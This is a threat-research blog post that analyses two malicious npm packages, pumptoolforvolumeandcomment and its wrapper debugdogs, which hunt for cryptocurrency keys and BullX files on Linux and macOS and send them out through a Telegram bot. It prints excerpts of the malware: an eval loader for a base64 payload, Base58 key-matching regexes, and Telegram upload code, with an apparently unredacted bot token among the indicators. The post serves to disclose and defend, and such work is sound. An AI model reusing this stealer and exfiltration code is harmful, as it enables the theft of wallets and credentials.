
Kush Pandya
May 8, 2025
Is Your Cryptocurrency Safe, or Is an npm Trojan Silently Emptying Your Wallets?
Socket’s Threat Research Team uncovered two malicious npm packages, pumptoolforvolumeandcomment and its wrapper [debugdogs](https://socket.dev/npm/package/debugdogs/overview/1.0.0), published by the same threat actor under the npm alias olumideyo. The loader in pumptoolforvolumeandcomment decodes an obfuscated payload that hunts for Base58-encoded cryptocurrency keys, wallet files, and “BullX” trading data across user directories on Linux and macOS systems, then exfiltrates the sensitive data via a Telegram bot. Meanwhile, debugdogs simply invokes pumptoolforvolumeandcomment, making it a convenient secondary infection payload. This highly targeted attack can empty wallets and expose sensitive credentials and trading data in seconds.
BullX is a cryptocurrency trading platform popular among crypto traders for its speed and efficiency in trading newly launched coins. The malicious actor explicitly targets its users to exfiltrate sensitive credentials and trading information.
BullX trading platform specifically targeted by olumideyo
The package’s loader (index.js) reads a sidecar file, base64-decodes it and executes the result:
```javascript
const fs = require('fs');
const path = require('path');
// parts.txt ships with the package and holds the base64-encoded payload
const base64Encoded = fs.readFileSync(path.join(__dirname, 'parts.txt'), 'utf8');
const decodedScript = Buffer.from(base64Encoded, 'base64').toString('utf8');
eval(decodedScript); // Executes the hidden malicious payload
```
Socket’s AI Scanners flagged the malicious npm package pumptoolforvolumeandcomment due to its obfuscated payload.
Socket’s AI scanner flagging the malicious npm package
The base64-decoded malicious payload found in parts.txt revealed advanced file-stealing capabilities, targeting cryptocurrency keys and specifically BullX-related files:
- It targets Linux (scanning /media mounts) and macOS (leveraging the /Volumes mount point). It won’t work on Windows out of the box, since it only looks in POSIX paths like ~/Documents, /media, and /Volumes.
- It collects files with the extensions .txt, .env, .docs, .log, .cfg, and .ini.
- It searches the collected files with three Base58 regular expressions:
```javascript
PATTERN_NAME_1 = /\b[123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{58,}\b/g;
PATTERN_NAME_2 = /\b[123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{43,57}\b/g;
PATTERN_NAME_3 = /\b[123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{58,}\b:\b[123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{43,}\b/g;
```
The regular expressions used by the malware specifically target Base58-encoded strings commonly used in cryptocurrency wallets and private keys, indicating the intent to steal crypto-related credentials. This targeted approach increases the risk of financial loss and unauthorized access to crypto assets.
BullX-related text files are collected separately, by file name:
```javascript
if (file_path.includes('BullX') && file_path.endsWith('.txt')) {
  bullX_contents.push({ file: file_path, content });
}
```
The malware compiles discovered secrets into a structured JSON file (fss.json) and uploads this file using an attacker-controlled Telegram bot, enabling stealthy and real-time exfiltration (excerpts from the decoded payload):
```javascript
// Build the multipart upload carrying the collected secrets file
const form = new FormData();
form.append('chat_id', chat_id);
form.append('document', fs.createReadStream(filePath));
// Hard-coded attacker bot token and destination chat
const bot_token = "7477833207:<REDACTED>";
const chat_id = "-1002402864775";
await axios.post(`https://api.telegram.org/bot${bot_token}/sendDocument`, form);
// Only exfiltrate if at least one key or BullX file was found
if (Object.values(keys_grouped).some(group => group.length > 0) || bullX_contents.length > 0) {
  const jsonMessage = format_keys_message();
  const filePath = path.join(customDir, 'fss.json'); // Save the JSON in the custom folder
  save_json_to_file(jsonMessage, filePath);
  send_json_file_to_telegram(filePath);
}
```
This setup allows the threat actor to receive instant updates and credentials, increasing the risk of rapid and targeted attacks against BullX traders and crypto wallet holders.
Wrapper package (debugdogs) identified
Upon deeper investigation, we discovered another npm package by the same malicious author named debugdogs, containing minimal functionality:
```javascript
// The whole package: require the real payload and call it
const pumptool = require('pumptoolforvolumeandcomment');
console.log(pumptool());
```
By pointing directly at pumptoolforvolumeandcomment, the author ensures that anyone installing debugdogs will automatically pull in and execute the real payload. This “wrapper” pattern doubles down on the main attack, making it easier to spread under multiple names without changing the core malicious code.
Malicious author olumideyo's npm profile (registration email bomakingg@gmail[.]com)
The targeted nature of this attack places affected users at high risk:
This attack highlights the urgent need for better scrutiny of npm packages in cryptocurrency and trading-related environments.
The targeted discovery of pumptoolforvolumeandcomment and related packages (debugdogs) underscores a growing and dangerous trend in software supply chain attacks targeting cryptocurrency traders and platforms like BullX. Attackers specifically exploit trust in developer-friendly tools and communication channels like Telegram, aiming for high-value credentials.
Developers and cryptocurrency users must adopt rigorous security practices to combat these threats, including automated dependency scanning, runtime behavior monitoring, and robust credentials management.
Integrating Socket’s security tools early in your workflow significantly mitigates such supply-chain attacks, protecting critical data from compromise and theft.
Telegram is consistently being used by threat actors to exfiltrate sensitive data due to its ease of use and low barrier of entry: it is trivial to spin up a Telegram bot in minutes and start receiving exfiltrated data.
- olumideyo, gojothenerd - name aliases
- bomakingg@gmail[.]com - email address
- 7477833207:AAGAxGtCoo2NXFD62dUV9DdT3HpK6d2PnHI - Telegram bot token
- 1002402864775 - Telegram chat ID